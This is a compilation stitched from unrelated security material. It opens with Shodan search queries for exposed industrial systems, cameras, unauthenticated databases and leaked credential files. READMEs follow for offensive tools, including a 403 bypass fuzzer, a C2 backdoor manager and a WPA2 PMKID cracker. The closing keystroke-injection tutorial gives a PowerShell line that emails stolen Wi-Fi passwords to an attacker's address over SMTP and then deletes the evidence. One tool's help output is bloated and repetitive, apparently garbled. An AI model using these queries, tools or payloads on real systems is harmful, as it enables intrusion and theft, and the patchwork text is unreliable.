device:firewall device:router device:wap device:webcam device:media device:"broadband router" device:pbx device:printer device:switch device:storage device:specialized device:phone device:"voip" device:"voip phone" device:"voip adaptor" device:"load balancer" device:"print server" device:terminal device:remote device:telecom device:power device:proxy device:pda device:bridge
os:"windows 7" os:"windows server 2012" os:"linux 3.x"
product:apache product:nginx product:android product:chromecast
cpe:apple cpe:microsoft cpe:nginx cpe:cisco
server: nginx server: apache server: microsoft server: cisco-ios
dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0
http.html:/dana-na
http.title:"Index of /" http.html:".pem"
onion-location
"product:MySQL" mysql port:"3306"
"product:MongoDB" mongodb port:27017
"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK" "MongoDB Server Information" port:27017 -authentication
kibana content-legth:217
port:9200 json port:"9200" all:elastic port:"9200" all:"elastic indices"
"product:Memcached"
"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"
"port:5432 PostgreSQL"
"port:8087 Riak"
"product:Redis"
"product:Cassandra"
"Server: Prismview Player"
"in-tank inventory" port:10001
No auth required to access CLI terminal. "privileged command" GET
P372 "ANPR enabled"
mikrotik streetlight
"voter system serial" country:US
May allow for ATM Access availability NCR Port:"161"
"Cisco IOS" "ADVIPSERVICESK9_LI-M"
"[2J[H Encartele Confidential"
http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
"Server: gSOAP/2.8" "Content-Length: 583"
Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!
"Cobham SATCOM" OR ("Sailor" "VSAT")
title:"Slocum Fleet Mission Control"
"Server: CarelDataServer" "200 Document follows"
http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"
"[1m[35mWelcome on console"
Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.
"DICOM Server Response" port:104
"Server: EIG Embedded Web Server" "200 Document follows"
"Siemens, SIMATIC" port:161
"Server: Microsoft-WinCE" "Content-Length: 12581"
"HID VertX" port:4070
"log off" "select the appropriate"
Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2
title:"xzeres wind"
"html:"PIPS Technology ALPR Processors""
"port:502"
"port:1911,4911 product:Niagara"
"port:18245,18246 product:"general electric""
"port:5006,5007 product:mitsubishi"
"port:2455 operating system"
"port:102"
"port:47808"
"port:5094 hart-ip"
"port:9600 response code"
"port:2404 asdu address"
"port:20000 source address"
"port:44818"
"port:1962 PLC"
"port:789 product:"Red Lion Controls"
"port:20547 PLC"
"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"
99.99% are secured by a secondary Windows login screen.
"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"
product:"cobalt strike team server" product:"Cobalt Strike Beacon" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1 ssl:foren.zik
http.html_hash:-1957161625 product:"Brute Ratel C4"
ssl:"Covenant" http.component:"Blazor"
ssl:"MetasploitSelfSignedCA"
Routers which got compromised hacked-router-help-sos
product:"Redis key-value store"
Find Citrix Gateway. title:"citrix gateway"
Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.
title:"Weave Scope" http.favicon.hash:567176827
"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"
Jenkins Unrestricted Dashboard x-jenkins 200
"Docker Containers:" port:2375
"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab
"dnsmasq-pi-hole" "Recursion: enabled"
"port: 53" Recursion: Enabled
"root@" port:23 -login -password -name -Session
NO password required for telnet access. port:23 console gateway
"polycom command shell"
nport -keyin port:23
A tangential result of Google's sloppy fractured update approach. 🙄 More information here.
"Android Debug Bridge" "Device" port:5555
Lantronix password port:30718 -secured
"Citrix Applications:" port:1604
Vulnerable (kind of "by design," but especially when exposed).
"smart install client active"
PBX "gateway console" -password port:23
http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23
"Polycom Command Shell" -failed port:23
Example: Polycom Video Conferencing
"Server: Bomgar" "200 OK"
"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 "Active Management Technology"
HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900
"Press Enter for Setup Mode port:9999"
Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"
The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"
"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"
"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392
"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"
"X-MS-Server-Fqdn"
Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.
"Authentication: disabled" port:445
"Authentication: disabled" NETLOGON SYSVOL -unix port:445
"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445
"220" "230 Login successful." port:21
"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"
Redirecting sencha port:9000
"Server: Logitech Media Server" "200 OK"
Example: Logitech Media Servers
"X-Plex-Protocol" "200 OK" port:32400
"CherryPy/5.1.0" "/home"
"IPC$ all storage devices"
title:camera
webcam has_screenshot:true
"d-Link Internet Camera, 200 OK"
"Hipcam RealServer/V1.0"
"Server: yawcam" "Mime-Type: text/html"
("webcam 7" OR "webcamXP") http.component:"mootools" -401
"Server: IP Webcam Server" "200 OK"
html:"DVR_H264 ActiveX"
With username:admin and password: :P NETSurveillance uc-httpd Server: uc-httpd 1.0.0
"Serial Number:" "Built:" "Server: HP HTTP"
ssl:"Xerox Generic Root"
"SERVER: EPSON_Linux UPnP" "200 OK"
"Server: EPSON-HTTP" "200 OK"
"Server: KS_HTTP" "200 OK"
"Server: CANON HTTP Server"
"Server: AV_Receiver" "HTTP/1.1 406"
Apple TVs, HomePods, etc.
"\x08_airplay" port:5353
"Chromecast:" port:8008
"Model: PYNG-HUB"
"Server: calibre" http.status:200 http.title:calibre
title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944
"ETH - Total speed"
Substitute .pem with any extension or a filename like phpinfo.php.
http.title:"Index of /" http.html:".pem"
Exposed wp-config.php files containing database credentials.
http.html:"* The wp-config.php creation script uses this file"
"Minecraft Server" "protocol 340" port:25565
net:175.45.176.0/22,210.52.109.0/24,77.94.35.0/24
DockF-Sec-Check helps to make your Dockerfile commands more secure.
You can use virtualenv for package dependencies before installation.
git clone https://github.com/OsmanKandemir/docf-sec-check.git
cd docf-sec-check
python setup.py build
python setup.py install
The application is available on PyPI. To install with pip:
pip install docfseccheck
You can run this application on a container after build a Dockerfile. You need to specify a path (YOUR-LOCAL-PATH) to scan the Dockerfile in your local.
docker build -t docfseccheck .
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile docfseccheck -f /docf-sec-check/Dockerfile
docker pull osmankandemir/docfseccheck:v1.0
docker run -v <YOUR-LOCAL-PATH>/Dockerfile:/docf-sec-check/Dockerfile osmankandemir/docfseccheck:v1.0 -f /docf-sec-check/Dockerfile
-f DOCKERFILE [DOCKERFILE], --file DOCKERFILE [DOCKERFILE] Dockerfile path. --file Dockerfile
from docfchecker import DocFChecker
#Dockerfile is your file PATH.
DocFChecker(["Dockerfile"])
Copyright (c) 2024 Osman Kandemir \ Licensed under the GPL-3.0 License.
If you like DocF-Sec-Check and would like to show support, you can use Buy A Coffee or Github Sponsors feature for the developer using the button below.
Or
Sponsor me : https://github.com/sponsors/OsmanKandemir 😊
Your support will be much appreciated😊
secator is a task and workflow runner used for security assessments. It supports dozens of well-known security tools and it is designed to improve productivity for pentesters and security researchers.
Curated list of commands
Unified input options
Unified output schema
CLI and library usage
Distributed options with Celery
Complexity from simple tasks to complex workflows
secator integrates the following tools:
| Name | Description | Category |
|---|---|---|
| httpx | Fast HTTP prober. | http |
| cariddi | Fast crawler and endpoint secrets / api keys / tokens matcher. | http/crawler |
| gau | Offline URL crawler (Alien Vault, The Wayback Machine, Common Crawl, URLScan). | http/crawler |
| gospider | Fast web spider written in Go. | http/crawler |
| katana | Next-generation crawling and spidering framework. | http/crawler |
| dirsearch | Web path discovery. | http/fuzzer |
| feroxbuster | Simple, fast, recursive content discovery tool written in Rust. | http/fuzzer |
| ffuf | Fast web fuzzer written in Go. | http/fuzzer |
| h8mail | Email OSINT and breach hunting tool. | osint |
| dnsx | Fast and multi-purpose DNS toolkit designed for running DNS queries. | recon/dns |
| dnsxbrute | Fast and multi-purpose DNS toolkit designed for running DNS queries (bruteforce mode). | recon/dns |
| subfinder | Fast subdomain finder. | recon/dns |
| fping | Find alive hosts on local networks. | recon/ip |
| mapcidr | Expand CIDR ranges into IPs. | recon/ip |
| naabu | Fast port discovery tool. | recon/port |
| maigret | Hunt for user accounts across many websites. | recon/user |
| gf | A wrapper around grep to avoid typing common patterns. | tagger |
| grype | A vulnerability scanner for container images and filesystems. | vuln/code |
| dalfox | Powerful XSS scanning tool and parameter analyzer. | vuln/http |
| msfconsole | CLI to access and work with the Metasploit Framework. | vuln/http |
| wpscan | WordPress Security Scanner | vuln/multi |
| nmap | Vulnerability scanner using NSE scripts. | vuln/multi |
| nuclei | Fast and customisable vulnerability scanner based on simple YAML based DSL. | vuln/multi |
| searchsploit | Exploit searcher. | exploit/search |
Feel free to request new tools to be added by opening an issue, but please check that the tool complies with our selection criterias before doing so. If it doesn't but you still want to integrate it into secator, you can plug it in (see the dev guide).
pipx install secator
pip install secator
wget -O - https://raw.githubusercontent.com/freelabz/secator/main/scripts/install.sh | sh
docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator --help
alias secator="docker run -it --rm --net=host -v ~/.secator:/root/.secator freelabz/secator"
secator --help
git clone https://github.com/freelabz/secator
cd secator
docker-compose up -d
docker-compose exec secator secator --help
Note: If you chose the Bash, Docker or Docker Compose installation methods, you can skip the next sections and go straight to Usage.
secator uses external tools, so you might need to install languages used by those tools assuming they are not already installed on your system.
We provide utilities to install required languages if you don't manage them externally:
secator install langs go
secator install langs ruby
secator does not install any of the external tools it supports by default.
We provide utilities to install or update each supported tool which should work on all systems supporting apt:
secator install tools
secator install tools <TOOL_NAME>
secator install tools httpx
Please make sure you are using the latest available versions for each tool before you run secator or you might run into parsing / formatting issues.
secator comes installed with the minimum amount of dependencies.
There are several addons available for secator:
secator install addons worker
secator install addons google
secator install addons mongodb
secator install addons redis
secator install addons dev
secator install addons trace
secator install addons build
secator makes remote API calls to https://cve.circl.lu/ to get in-depth information about the CVEs it encounters. We provide a subcommand to download all known CVEs locally so that future lookups are made from disk instead:
secator install cves
To figure out which languages or tools are installed on your system (along with their version):
secator health
secator --help
Run a fuzzing task (ffuf):
secator x ffuf http://testphp.vulnweb.com/FUZZ
Run a url crawl workflow:
secator w url_crawl http://testphp.vulnweb.com
Run a host scan:
secator s host mydomain.com
and more... to list all tasks / workflows / scans that you can use:
secator x --help
secator w --help
secator s --help
To go deeper with secator, check out: * Our complete documentation * Our getting started tutorial video * Our Medium post * Follow us on social media: @freelabz on Twitter and @FreeLabz on YouTube
The Damn Vulnerable Drone is an intentionally vulnerable drone hacking simulator based on the popular ArduPilot/MAVLink architecture, providing a realistic environment for hands-on drone hacking.
The Damn Vulnerable Drone is a virtually simulated environment designed for offensive security professionals to safely learn and practice drone hacking techniques. It simulates real-world ArduPilot & MAVLink drone architectures and vulnerabilities, offering a hands-on experience in exploiting drone systems.
The Damn Vulnerable Drone aims to enhance offensive security skills within a controlled environment, making it an invaluable tool for intermediate-level security professionals, pentesters, and hacking enthusiasts.
Similar to how pilots utilize flight simulators for training, we can use the Damn Vulnerable Drone simulator to gain in-depth knowledge of real-world drone systems, understand their vulnerabilities, and learn effective methods to exploit them.
The Damn Vulnerable Drone platform is open-source and available at no cost and was specifically designed to address the substantial expenses often linked with drone hardware, hacking tools, and maintenance. Its cost-free nature allows users to immerse themselves in drone hacking without financial concerns. This accessibility makes the Damn Vulnerable Drone a crucial resource for those in the fields of information security and penetration testing, promoting the development of offensive cybersecurity skills in a safe environment.
The Damn Vulnerable Drone platform operates on the principle of Software-in-the-Loop (SITL), a simulation technique that allows users to run drone software as if it were executing on an actual drone, thereby replicating authentic drone behaviors and responses.
ArduPilot's SITL allows for the execution of the drone's firmware within a virtual environment, mimicking the behavior of a real drone without the need for physical hardware. This simulation is further enhanced with Gazebo, a dynamic 3D robotics simulator, which provides a realistic environment and physics engine for the drone to interact with. Together, ArduPilot's SITL and Gazebo lay the foundation for a sophisticated and authentic drone simulation experience.
While the current Damn Vulnerable Drone setup doesn't mirror every drone architecture or configuration, the integrated tactics, techniques and scenarios are broadly applicable across various drone systems, models and communication protocols.
SherlockChain is a powerful smart contract analysis framework that combines the capabilities of the renowned Slither tool with advanced AI-powered features. Developed by a team of security experts and AI researchers, SherlockChain offers unparalleled insights and vulnerability detection for Solidity, Vyper and Plutus smart contracts.
To install SherlockChain, follow these steps:
git clone https://github.com/0xQuantumCoder/SherlockChain.git
cd SherlockChain
pip install .
SherlockChain's AI integration brings several advanced capabilities to the table:
Natural Language Interaction: Users can interact with SherlockChain using natural language, allowing them to query the tool, request specific analyses, and receive detailed responses. he --help command in the SherlockChain framework provides a comprehensive overview of all the available options and features. It includes information on:
Vulnerability Detection: The --detect and --exclude-detectors options allow users to specify which vulnerability detectors to run, including both built-in and AI-powered detectors.
--report-format, --report-output, and various --report-* options control how the analysis results are reported, including the ability to generate reports in different formats (JSON, Markdown, SARIF, etc.).--filter-* options enable users to filter the reported issues based on severity, impact, confidence, and other criteria.--ai-* options allow users to configure and control the AI-powered features of SherlockChain, such as prioritizing high-impact vulnerabilities, enabling specific AI detectors, and managing AI model configurations.--truffle and --truffle-build-directory facilitate the integration of SherlockChain into popular development frameworks like Truffle.The --help command provides a detailed explanation of each option, its purpose, and how to use it, making it a valuable resource for users to quickly understand and leverage the full capabilities of the SherlockChain framework.
Example usage:
sherlockchain --help
This will display the comprehensive usage guide for the SherlockChain framework, including all available options and their descriptions.
usage: sherlockchain [-h] [--version] [--solc-remaps SOLC_REMAPS] [--solc-settings SOLC_SETTINGS]
[--solc-version SOLC_VERSION] [--truffle] [--truffle-build-directory TRUFFLE_BUILD_DIRECTORY]
[--truffle-config-file TRUFFLE_CONFIG_FILE] [--compile] [--list-detectors]
[--list-detectors-info] [--detect DETECTORS] [--exclude-detectors EXCLUDE_DETECTORS]
[--print-issues] [--json] [--markdown] [--sarif] [--text] [--zip] [--output OUTPUT]
[--filter-paths FILTER_PATHS] [--filter-paths-exclude FILTER_PATHS_EXCLUDE]
[--filter-contracts FILTER_CONTRACTS] [--filter-contracts-exclude FILTER_CONTRACTS_EXCLUDE]
[--filter-severity FILTER_SEVERITY] [--filter-impact FILTER_IMPACT]
[--filter-confidence FILTER_CONFIDENCE] [--filter-check-suicidal]
[--filter-check-upgradeable] [--f ilter-check-erc20] [--filter-check-erc721]
[--filter-check-reentrancy] [--filter-check-gas-optimization] [--filter-check-code-quality]
[--filter-check-best-practices] [--filter-check-ai-detectors] [--filter-check-all]
[--filter-check-none] [--check-all] [--check-suicidal] [--check-upgradeable]
[--check-erc20] [--check-erc721] [--check-reentrancy] [--check-gas-optimization]
[--check-code-quality] [--check-best-practices] [--check-ai-detectors] [--check-none]
[--check-all-detectors] [--check-all-severity] [--check-all-impact] [--check-all-confidence]
[--check-all-categories] [--check-all-filters] [--check-all-options] [--check-all]
[--check-none] [--report-format {json,markdown,sarif,text,zip}] [--report-output OUTPUT]
[--report-severity REPORT_SEVERITY] [--report-impact R EPORT_IMPACT]
[--report-confidence REPORT_CONFIDENCE] [--report-check-suicidal]
[--report-check-upgradeable] [--report-check-erc20] [--report-check-erc721]
[--report-check-reentrancy] [--report-check-gas-optimization] [--report-check-code-quality]
[--report-check-best-practices] [--report-check-ai-detectors] [--report-check-all]
[--report-check-none] [--report-all] [--report-suicidal] [--report-upgradeable]
[--report-erc20] [--report-erc721] [--report-reentrancy] [--report-gas-optimization]
[--report-code-quality] [--report-best-practices] [--report-ai-detectors] [--report-none]
[--report-all-detectors] [--report-all-severity] [--report-all-impact]
[--report-all-confidence] [--report-all-categories] [--report-all-filters]
[--report-all-options] [- -report-all] [--report-none] [--ai-enabled] [--ai-disabled]
[--ai-priority-high] [--ai-priority-medium] [--ai-priority-low] [--ai-priority-all]
[--ai-priority-none] [--ai-confidence-high] [--ai-confidence-medium] [--ai-confidence-low]
[--ai-confidence-all] [--ai-confidence-none] [--ai-detectors-all] [--ai-detectors-none]
[--ai-detectors-specific AI_DETECTORS_SPECIFIC] [--ai-detectors-exclude AI_DETECTORS_EXCLUDE]
[--ai-models-path AI_MODELS_PATH] [--ai-models-update] [--ai-models-download]
[--ai-models-list] [--ai-models-info] [--ai-models-version] [--ai-models-check]
[--ai-models-upgrade] [--ai-models-remove] [--ai-models-clean] [--ai-models-reset]
[--ai-models-backup] [--ai-models-restore] [--ai-models-export] [--ai-models-import]
[--ai-models-config AI_MODELS_CONFIG] [--ai-models-config-update] [--ai-models-config-reset]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-list]
[--ai-models-config-info] [--ai-models-config-version] [--ai-models-config-check]
[--ai-models-config-upgrade] [--ai-models-config-remove] [--ai-models-config-clean]
[--ai-models-config-reset] [--ai-models-config-backup] [--ai-models-config-restore]
[--ai-models-config-export] [--ai-models-config-import] [--ai-models-config-path AI_MODELS_CONFIG_PATH]
[--ai-models-config-file AI_MODELS_CONFIG_FILE] [--ai-models-config-url AI_MODELS_CONFIG_URL]
[--ai-models-config-name AI_MODELS_CONFIG_NAME] [--ai-models-config-description AI_MODELS_CONFIG_DESCRIPTION]
[--ai-models-config-version-major AI_MODELS_CONFIG_VERSION_MAJOR]
[--ai-models-config- version-minor AI_MODELS_CONFIG_VERSION_MINOR]
[--ai-models-config-version-patch AI_MODELS_CONFIG_VERSION_PATCH]
[--ai-models-config-author AI_MODELS_CONFIG_AUTHOR]
[--ai-models-config-license AI_MODELS_CONFIG_LICENSE]
[--ai-models-config-url-documentation AI_MODELS_CONFIG_URL_DOCUMENTATION]
[--ai-models-config-url-source AI_MODELS_CONFIG_URL_SOURCE]
[--ai-models-config-url-issues AI_MODELS_CONFIG_URL_ISSUES]
[--ai-models-config-url-changelog AI_MODELS_CONFIG_URL_CHANGELOG]
[--ai-models-config-url-support AI_MODELS_CONFIG_URL_SUPPORT]
[--ai-models-config-url-website AI_MODELS_CONFIG_URL_WEBSITE]
[--ai-models-config-url-logo AI_MODELS_CONFIG_URL_LOGO]
[--ai-models-config-url-icon AI_MODELS_CONFIG_URL_ICON]
[--ai-models-config-url-banner AI_MODELS_CONFIG_URL_BANNER]
[--ai-models-config-url-screenshot AI_MODELS_CONFIG_URL_SCREENSHOT]
[--ai-models-config-url-video AI_MODELS_CONFIG_URL_VIDEO]
[--ai-models-config-url-demo AI_MODELS_CONFIG_URL_DEMO]
[--ai-models-config-url-documentation-api AI_MODELS_CONFIG_URL_DOCUMENTATION_API]
[--ai-models-config-url-documentation-user AI_MODELS_CONFIG_URL_DOCUMENTATION_USER]
[--ai-models-config-url-documentation-developer AI_MODELS_CONFIG_URL_DOCUMENTATION_DEVELOPER]
[--ai-models-config-url-documentation-faq AI_MODELS_CONFIG_URL_DOCUMENTATION_FAQ]
[--ai-models-config-url-documentation-tutorial AI_MODELS_CONFIG_URL_DOCUMENTATION_TUTORIAL]
[--ai-models-config-url-documentation-guide AI_MODELS_CONFIG_URL_DOCUMENTATION_GUIDE]
[--ai-models-config-url-documentation-whitepaper AI_MODELS_CONFIG_URL_DOCUMENTATION_WHITEPAPER]
[--ai-models-config-url-documentation-roadmap AI_MODELS_CONFIG_URL_DOCUMENTATION_ROADMAP]
[--ai-models-config-url-documentation-blog AI_MODELS_CONFIG_URL_DOCUMENTATION_BLOG]
[--ai-models-config-url-documentation-community AI_MODELS_CONFIG_URL_DOCUMENTATION_COMMUNITY]
This comprehensive usage guide provides information on all the available options and features of the SherlockChain framework, including:
--detect, --exclude-detectors
--report-format, --report-output, --report-*
--filter-*
--ai-*
--truffle, --truffle-build-directory
--compile, --list-detectors, --list-detectors-info
By reviewing this comprehensive usage guide, you can quickly understand how to leverage the full capabilities of the SherlockChain framework to analyze your smart contracts and identify potential vulnerabilities. This will help you ensure the security and reliability of your DeFi protocol before deployment.
| Num | Detector | What it Detects | Impact | Confidence |
|---|---|---|---|---|
| 1 | ai-anomaly-detection | Detect anomalous code patterns using advanced AI models | High | High |
| 2 | ai-vulnerability-prediction | Predict potential vulnerabilities using machine learning | High | High |
| 3 | ai-code-optimization | Suggest code optimizations based on AI-driven analysis | Medium | High |
| 4 | ai-contract-complexity | Assess contract complexity and maintainability using AI | Medium | High |
| 5 | ai-gas-optimization | Identify gas-optimizing opportunities with AI | Medium | Medium |
| ## Detectors |
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACL's or URL validation.
It will output the response codes and length for each request, in a nicely organized, color coded way so things are reaable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request. - Easiest way to authenticate for your requests
python3 bypassfuzzer.py -r request.txt
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah¶m2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah¶m2=blah2"
Specify custom headers to use with every request Maybe you need to add some kind of auth header like Authorization: bearer <token>
Specify -H "header: value" for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length. If it sees a response 8 times or more it will automatically mute it.
Repeats are changeable in the code until I add an option to specify it in flag
NOTE: Can't be used simultaneously with -hc or -hl (yet)
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normailization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
Download the binaries
or build the binaries and you are ready to go:
$ git clone https://github.com/Nemesis0U/PingRAT.git
$ go build client.go
$ go build server.go
./server -h
Usage of ./server:
-d string
Destination IP address
-i string
Listener (virtual) Network Interface (e.g. eth0)
./client -h
Usage of ./client:
-d string
Destination IP address
-i string
(Virtual) Network Interface (e.g., eth0)
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
🔒 Anywhere Access: Reach the C2 Cloud from any location.
🔄 Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
🖱️ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
📜 Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
🛠️ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
🔗 TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
📨 Redis PubSub: Serving as a robust message broker for seamless communication.
🚀 Websockets: Delivering real-time updates to browser clients for enhanced user experience.
💾 Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
Noia is a web-based tool whose main aim is to ease the process of browsing mobile applications sandbox and directly previewing SQLite databases, images, and more. Powered by frida.re.
Please note that I'm not a programmer, but I'm probably above the median in code-savyness. Try it out, open an issue if you find any problems. PRs are welcome.
npm install -g noia
noia
Explore third-party applications files and directories. Noia shows you details including the access permissions, file type and much more.
View custom binary files. Directly preview SQLite databases, images, and more.
Search application by name.
Search files and directories by name.
Navigate to a custom directory using the ctrl+g shortcut.
Download the application files and directories for further analysis.
Basic iOS support
and more
Noia is available on npm, so just type the following command to install it and run it:
npm install -g noia
noia
Noia is powered by frida.re, thus requires Frida to run.
See: * https://frida.re/docs/android/ * https://frida.re/docs/ios/
Security Warning
This tool is not secure and may include some security vulnerabilities so make sure to isolate the webpage from potential hackers.
MIT
This program is a tool written in Python to recover the pre-shared key of a WPA2 WiFi network without any de-authentication or requiring any clients to be on the network. It targets the weakness of certain access points advertising the PMKID value in EAPOL message 1.
python pmkidcracker.py -s <SSID> -ap <APMAC> -c <CLIENTMAC> -p <PMKID> -w <WORDLIST> -t <THREADS(Optional)>
NOTE: apmac, clientmac, pmkid must be a hexstring, e.g b8621f50edd9
The two main formulas to obtain a PMKID are as follows:
This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.
Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.
*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.
To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.
Open the pcap in WireShark:
wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.If access point is vulnerable, you should see the PMKID value like the below screenshot:
This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.
Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.
Disclaimer: All content in this project is intended for security research purpose only.
During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).
After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.
Physical access to victim's computer.
Unlocked victim's computer.
Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.
Knowledge of victim's computer password for the Linux exploit.
Note:
It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.
However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.
In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.
Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.
The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.
We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.
Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:
This approach was used for the Windows exploit. The whole payload can be seen here.
This approach was used for the Linux exploit. The whole payload can be seen here.
In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.
Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.
| STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587 |
Note:
After sending data over the email, the
.txtfile is deleted.You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.
